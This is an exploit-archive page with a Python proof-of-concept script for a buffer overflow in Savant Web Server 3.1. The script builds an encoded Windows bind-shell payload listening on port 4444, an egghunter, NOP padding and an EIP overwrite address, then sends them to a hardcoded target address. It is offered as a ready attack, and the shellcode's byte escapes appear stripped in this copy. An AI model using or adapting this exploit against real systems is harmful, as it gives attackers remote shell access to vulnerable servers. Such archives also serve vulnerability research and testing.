Home / exploits Savant Web Server 3.1 Buffer Overflow
Posted on 21 January 2012
#!/usr/bin/python import socket target_address="10.10.10.129" target_port=80 buffer2 = "R0cX" + "R0cX" # msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c buffer2 += ("xbdxecx37x93x4bxdbxcfxd9x74x24xf4x58x31xc9xb1" "x6ax83xc0x04x31x68x10x03x68x10x0exc2x4axa1x17" "x59x49xc2xffx91x58x90x5dx29xecxb0x10xb1x92xd3" "xaex07xc5x35x4dx38xf3xdbx06xfcxecx5fxa5x66x93" "xccx5dx07x81xcbxccx59x35x45xd6x2dx15xa1xe7xbb" "xd6x5dx68x57x1bx2ax4fxe8xddxd3xc0x84x0cx0exb7" "x03x24xc7xfdxd2xa5x88x89xf8x07x82x1bxcbx2dx3b" "xfdx9dx67xa9xffxe9x20x9exa9x25x8bx7cxdaxd9x01" "x32x51x36x9axe7x73x8fxe5xeax60xa6x4cx78xefxbb" "x1ex37xd0xbdxaax4fxe7x94x3ex02x34x21xc6xc1xe2" "xa3x6fx76x92x9axedxdax19x2dxcax21xb2xb0xa9xb5" "x72xa1xbbxd0x18x64xd3xb4x85x0cx92xf7x07xcfx13" "xc2x95x57x0ax68x6dx94x6fx5axadxd1x82x26x9fx3c" "x0dx2bxdcx06x6axd3x87x24x9cx14x58x71x42xefx1b" "x90xdcx46x67x51xd3x4cxc4x11x23x29xbdxc5xabx96" "x54x5exb6x08x60x42x5fx7ax76xdfx30x05x76xb7xd1" "xf2x49xbax14x69xa7x7bxa8x6bxb9xadxc8x8ex0fx9e" "x07x7fxa7x89x9bx4dx68xbdx45x77xe0x64xecxa2x18" "x2dx6fx10xc3x14x1dx4ex92x3ax8axf0xd8x07x12x19" "x27x0cx23xe4x0bxbbx6dx97xf8xe8x8cx23xb5xe0x22" "xe8x70x85x10xbbx64xbex09x41xe7x2dx6dx39xfbxcc" "x09xeexcax8fx83x22x5dx77x2bx5bxc6x1bx82x6ex17" "x03xe8x6cx35x55x71xd4x35x72x12x3fx11x6excfx09" "x5axd0x33x40x8ex3fx36xbfxd7xd0x85x17x03xd3xc4" "x7fx17x6exe8x0dxa6x5fx9exd6x1bxf4x2bx8cxb3xad" "x19xb3x70xacx56x76x0cxfbx4fxc4x99xddx99x75x8f" "xa8xfax91x5cxfbx26xbdx8axeaxecx0dxf1x45x4fx72" "xd1x02x47x9cxa5x33x1exf8xc7x00xd2x3dx86xb4x7c" "xb9x85x5fx8cx40x58x7ex7cx5dx76x3axd6x0bx9exfe" "x88xc7x60x56x99x19x7fx7axdax93x72x99x3fx69") badbuffer = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x52x30x63x58x8bxfaxafx75xeaxafx75xe7xffxe7" # egghunter searching for R0cX badbuffer += "x90" * (254 - len(badbuffer)) badbuffer += "x09x1Dx40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN httpmethod = "xb0x03x04x01x7Bx14" # MOV AL, 3; ADD AL, 1; JPO 14 sendbuf = httpmethod + " /%" + badbuffer + ' ' + buffer2 sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=sock.connect((target_address,target_port)) sock.send(sendbuf) sock.close()
